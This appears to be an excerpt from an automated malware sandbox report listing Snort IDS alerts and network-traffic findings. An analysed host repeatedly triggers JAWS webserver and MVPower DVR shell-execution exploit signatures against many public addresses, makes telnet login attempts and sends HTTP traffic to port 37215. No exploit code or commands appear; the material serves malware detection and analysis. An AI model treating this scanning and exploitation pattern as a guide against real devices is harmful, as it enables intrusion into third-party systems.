        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53152 -> 104.20.210.137:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44104 -> 104.17.85.249:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53152 -> 104.20.210.137:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44104 -> 104.17.85.249:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52400 -> 188.22.249.182:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36182 -> 173.223.72.239:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42384 -> 54.208.245.216:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40336 -> 104.19.238.250:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39650 -> 184.74.14.186:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48354 -> 172.67.153.47:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40336 -> 104.19.238.250:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50440 -> 222.173.167.222:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48354 -> 172.67.153.47:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 173.223.72.239:80 -> 192.168.2.23:36182
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36182 -> 173.223.72.239:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37552 -> 119.23.228.221:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59334 -> 147.182.137.234:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39650 -> 184.74.14.186:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60880 -> 23.193.155.122:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50440 -> 222.173.167.222:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54490 -> 44.195.10.254:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45144 -> 140.82.149.170:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37552 -> 119.23.228.221:80
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 118.38.215.35:23 -> 192.168.2.23:33030
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 118.38.215.35:23 -> 192.168.2.23:33030
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.193.155.122:80 -> 192.168.2.23:60880
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60880 -> 23.193.155.122:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52902 -> 54.184.47.21:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56468 -> 197.243.232.121:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41596 -> 154.201.243.19:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38558 -> 154.210.191.210:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47040 -> 190.15.248.13:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48970 -> 103.229.146.30:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41596 -> 154.201.243.19:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48970 -> 103.229.146.30:80
        Source: TrafficSnort IDS: 716 INFO TELNET access 118.38.215.35:23 -> 192.168.2.23:33636
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 118.38.215.35:23 -> 192.168.2.23:33340
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 118.38.215.35:23 -> 192.168.2.23:33340
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60622 -> 54.89.150.60:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39958 -> 23.230.20.193:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39624 -> 54.39.20.193:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57310 -> 168.76.117.204:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56138 -> 96.9.6.155:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60622 -> 54.89.150.60:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59142 -> 23.6.62.216:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39624 -> 54.39.20.193:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39958 -> 23.230.20.193:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56138 -> 96.9.6.155:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.6.62.216:80 -> 192.168.2.23:59142
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41872 -> 104.81.177.215:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46340 -> 220.90.73.191:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53804 -> 160.124.101.218:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52404 -> 47.111.1.50:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.81.177.215:80 -> 192.168.2.23:41872
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38852 -> 203.63.58.223:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46340 -> 220.90.73.191:80
        Source: TrafficSnort IDS: 716 INFO TELNET access 118.38.215.35:23 -> 192.168.2.23:33712
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 14.243.16.152:23 -> 192.168.2.23:35440
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 14.243.16.152:23 -> 192.168.2.23:35440
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38852 -> 203.63.58.223:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51722 -> 164.132.18.82:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42732 -> 198.211.120.30:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60054 -> 80.252.0.153:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60722 -> 185.115.172.189:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53190 -> 54.192.163.156:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60244 -> 52.206.31.174:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41124 -> 169.57.62.143:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53190 -> 54.192.163.156:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41124 -> 169.57.62.143:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45442 -> 106.55.143.52:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45442 -> 106.55.143.52:80
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 118.38.215.35:23 -> 192.168.2.23:33636
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 118.38.215.35:23 -> 192.168.2.23:33636
        Source: TrafficSnort IDS: 716 INFO TELNET access 109.167.94.86:23 -> 192.168.2.23:50162
        Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 80.217.32.49: -> 192.168.2.23:
        Source: TrafficSnort IDS: 716 INFO TELNET access 118.38.215.35:23 -> 192.168.2.23:33886
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 118.38.215.35:23 -> 192.168.2.23:33712
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 118.38.215.35:23 -> 192.168.2.23:33712
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53090 -> 185.182.65.181:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49454 -> 95.46.175.208:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42380 -> 75.171.92.40:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43766 -> 104.70.210.142:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33792 -> 66.211.109.118:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46720 -> 216.92.232.206:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48634 -> 52.76.37.16:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.70.210.142:80 -> 192.168.2.23:43766
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43766 -> 104.70.210.142:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47422 -> 147.0.16.226:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54338 -> 23.202.251.164:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46720 -> 216.92.232.206:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.202.251.164:80 -> 192.168.2.23:54338
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54338 -> 23.202.251.164:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53356 -> 197.47.14.212:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58144 -> 23.77.173.247:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48634 -> 52.76.37.16:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53356 -> 197.47.14.212:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53012 -> 73.142.238.189:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.77.173.247:80 -> 192.168.2.23:58144
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34594 -> 103.175.166.39:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39014 -> 96.7.11.156:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53012 -> 73.142.238.189:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 96.7.11.156:80 -> 192.168.2.23:39014
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39014 -> 96.7.11.156:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34594 -> 103.175.166.39:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49338 -> 201.150.176.123:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49338 -> 201.150.176.123:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46504 -> 34.117.22.89:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40528 -> 13.33.247.24:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56204 -> 151.101.42.112:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58978 -> 162.248.210.244:80
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 14.243.16.152:23 -> 192.168.2.23:35864
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 14.243.16.152:23 -> 192.168.2.23:35864
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58978 -> 162.248.210.244:80
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 118.38.215.35:23 -> 192.168.2.23:33886
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 118.38.215.35:23 -> 192.168.2.23:33886
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44924 -> 161.97.101.234:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52020 -> 192.159.65.167:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46498 -> 104.85.151.218:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48950 -> 173.254.69.123:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58320 -> 13.231.7.121:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45814 -> 168.206.121.242:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50182 -> 212.127.224.179:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52820 -> 150.214.54.250:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54816 -> 213.159.209.120:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50182 -> 212.127.224.179:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35158 -> 23.7.42.43:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52020 -> 192.159.65.167:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.85.151.218:80 -> 192.168.2.23:46498
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43450 -> 13.58.116.206:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.7.42.43:80 -> 192.168.2.23:35158
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45814 -> 168.206.121.242:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43190 -> 102.162.93.216:80
        Source: TrafficSnort IDS: 716 INFO TELNET access 50.206.137.254:23 -> 192.168.2.23:39342
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52868 -> 150.214.54.250:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54864 -> 213.159.209.120:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40412 -> 46.165.204.115:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59058 -> 31.31.77.125:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54864 -> 213.159.209.120:80
        Source: global trafficTCP traffic: 197.105.166.150 ports 1,2,3,5,7,37215
        Source: global trafficTCP traffic: 156.250.29.50 ports 1,2,3,5,7,37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47304 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43030 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43230 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 60934 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54034 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59870 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54034 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54034 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 39286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49462
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49486
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 38064 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49512
        Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 38064
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49546
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49656
        Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49692
        Source: unknownNetwork traffic detected: HTTP traffic on port 58230 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49838
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49864
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49900
        Source: unknownNetwork traffic detected: HTTP traffic on port 54034 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49940
        Source: unknownNetwork traffic detected: HTTP traffic on port 44600 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49966
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50034
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50078
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50122
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50158
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50198
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50236
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50324
        Source: unknownNetwork traffic detected: HTTP traffic on port 44182 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50390
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50424
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50466
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50482
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50488
        Source: unknownNetwork traffic detected: HTTP traffic on port 41686 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50492
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50514
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50550
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 50574
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 45068 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59236 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33872 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 40160 -> 37215
